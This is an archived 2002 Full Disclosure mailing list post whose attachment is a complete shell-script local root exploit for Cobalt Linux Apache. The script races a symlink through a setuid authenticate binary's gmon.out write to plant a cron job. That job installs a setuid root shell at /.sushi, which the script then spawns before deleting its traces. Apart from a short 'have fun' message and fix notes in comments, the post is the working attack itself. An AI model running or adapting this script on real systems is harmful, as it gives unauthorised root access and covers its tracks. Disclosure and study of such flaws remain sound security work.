Full Disclosure mailing list archives

Cobalt Linux Apache Local Root Exploit

From: full-disclosure () lists netsys com (Charles Stevenson)
Date: Tue, 20 Aug 2002 14:33:47 -0600
--4SFOXa2GPu3tIq4H
Content-Type: multipart/mixed; boundary="jRHKVT23PllUwdXP"
Content-Disposition: inline


--jRHKVT23PllUwdXP
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

I've been sitting on this a while but what the hell... have fun.

peace,
core

--=20
  Charles Stevenson (core) <core () bokeoa com>
  Lab Assistant, College of Eastern Utah San Juan Campus=20
  http://www.bokeoa.com/~core/core.asc


--jRHKVT23PllUwdXP
Content-Type: application/x-sh
Content-Disposition: attachment; filename="RaQFuCK.sh"
Content-Transfer-Encoding: quoted-printable

#!/bin/sh=0A#=0A# Cobalt Linux 6.0 Local Root Exploit=0A#=0A# Effects: <=3D=
 apache-1.3.20-RaQ4_1C3 (AFAIK all Cobalt Linux Apache ;)=0A# Quick Fix: su=
 - root -c "chmod 755 /usr/lib/authenticate"=0A#=0A# Problem Source Code:=
=0A# fd =3D open("gmon.out", O_WRONLY|O_CREAT|O_TRUNC, 0666);=0A#=0A# Sugge=
sted Code:=0A# fd =3D mkstemp("/tmp/gmon.out-XXXXXX");=0A# =0A# Still need =
help Cobalt developers? Ok:=0A# man 3 tmpfile; man 2 open; echo "Thanks cor=
e"=0A#=0A# by Charles Stevenson <core () bokeoa com>=0A#=0A# Fri Jun 28 03:35:=
53 MDT 2002=0A# - initial version=0A# Sun Jul  7 20:12:41 MDT 2002=0A# - ad=
ded some features for robustness=0A=0Aecho "RaQFuCK.sh by core"=0A=0Atarget=
=3D"/usr/lib/authenticate"=0Atempdir=3D"/tmp"=0A=0Aif [ -u /.sushi ] ; then=
 =0A    exec /.sushi=0Afi=0A=0Aprintf "Checking for $target..."=0Aif [ -f "=
$target" ] ; then =0A    echo "done."=0Aelse=0A    echo "NO!"=0A    exit 1=
=0Afi=0A=0Aprintf "Checking if $target is setuid root..."=0Aif [ -u "$targe=
t" ] ; then =0A    echo "done."=0Aelse=0A    echo "NO! Hrm... does this adm=
in have a clue???"=0A    exit 1=0Afi=0A=0Aif [ ! -d "$tempdir/core" ]; then=
=0A    printf "Creating $tempdir/core..."=0A    if ! mkdir "$tempdir/core" =
2>/dev/null ; then=0A   echo "FAILED!" ; exit 1=0A    fi=0A    echo "done."=
=0Afi=0A=0Aprintf "Changing directory to $tempdir/core..."=0Aif ! cd "$temp=
dir/core" 2>/dev/null ; then =0A    echo "FAILED!" ; exit 1=0Aelse=0A    ec=
ho "done."=0Afi=0A=0Aprintf "Creating cron.d symlink..."=0Aif ! ln -fs /etc=
/cron.d/core gmon.out 2>/dev/null; then=0A    echo "FAILED!" ; exit 1=0Aels=
e=0A    echo "done."=0Afi=0A=0Aprintf "Changing umask..."=0Aif ! umask 000 =
; then=0A    echo "FAILED!" ; exit 1=0Aelse=0A    echo "done."=0Afi=0A=0Apr=
intf "Compiling root shell..."=0Acat >sushi.c <<EOF=0A#include <unistd.h>=
=0Aint main (int argc, char **argv, char **envp) {=0A    setuid(0); =0A    =
setgid(0); =0A    execve("/bin/sh",argv,envp);=0A    return -1;=0A}=0AEOF=
=0Aif ! cc sushi.c -o sushi 2>/dev/null; then=0A    echo "FAILED!" ; exit 1=
=0Aelse=0A    echo "done."=0Afi=0A=0Aprintf "Compiling cron takeover..."=0A=
cat >takeover.c <<EOF=0A#include <stdlib.h>=0Amain() { system("cp $tempdir/=
core/sushi /.sushi ; chmod 6777 /.sushi"); }=0AEOF=0Aif ! cc takeover.c -o =
own 2>/dev/null; then=0A    echo "FAILED!" ; exit 1=0Afi=0Aecho "done."=0A=
=0Aprintf "Performing symlink attack..."=0Aprintf "\n\n\n\n" | "$target"=0A=
if [ -u /etc/cron.d/core ] ; then=0A    echo "SYMLINK ATTACK FAILED!" && ex=
it 1=0Aelse =0A    echo "done."=0Afi=0A=0Aprintf "Setting up evil cron job.=
.."=0Acat >croncore <<EOF=0A*/1 * * * * root if [ -x "$tempdir/core/own" ] =
; then "$tempdir/core/own"; fi=0AEOF=0Aif ! cat croncore 2>/dev/null >/etc/=
cron.d/core; then=0A    echo "FAILED!" ; exit 1=0Aelse=0A    echo "done."=
=0Afi=0A=0Aprintf "Waiting for root shell"=0Awhile [ ! -u /.sushi ] ; do=0A=
    sleep 1 ; printf "."=0Adone=0Aecho "done."=0A=0Acd /=0A=0Aprintf "Clean=
ing up real quick..."=0Aif ! /.sushi -c "rm -rf $tempdir/core /etc/cron.d/c=
ore"; then=0A    echo "FAILED??? Fuck it!"=0Aelse=0A    echo "done."=0Afi=
=0A=0Aecho "Spawning root shell!!! God Damn! I say GOD DAMN!!"=0Aif ! exec =
/.sushi -i; then=0A    echo "Exec Failed!!! BUMMER!" ; exit 1=0Afi=0A
--jRHKVT23PllUwdXP--

--4SFOXa2GPu3tIq4H
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQE9YqeqGAuLrxOyeJMRAkglAKCkNh5xxnIrJYZlPLkRQ9XoXa2YFwCg23jN
XXrrMfFJ1nJtxgfzjK5Ds9w=
=IzJX
-----END PGP SIGNATURE-----

--4SFOXa2GPu3tIq4H--
Current thread:

Cobalt Linux Apache Local Root Exploit Charles Stevenson (Aug 20)
- Cobalt Linux Apache Local Root Exploit Ka (Aug 20)
  - Cobalt Linux Apache Local Root Exploit Charles Stevenson (Aug 20)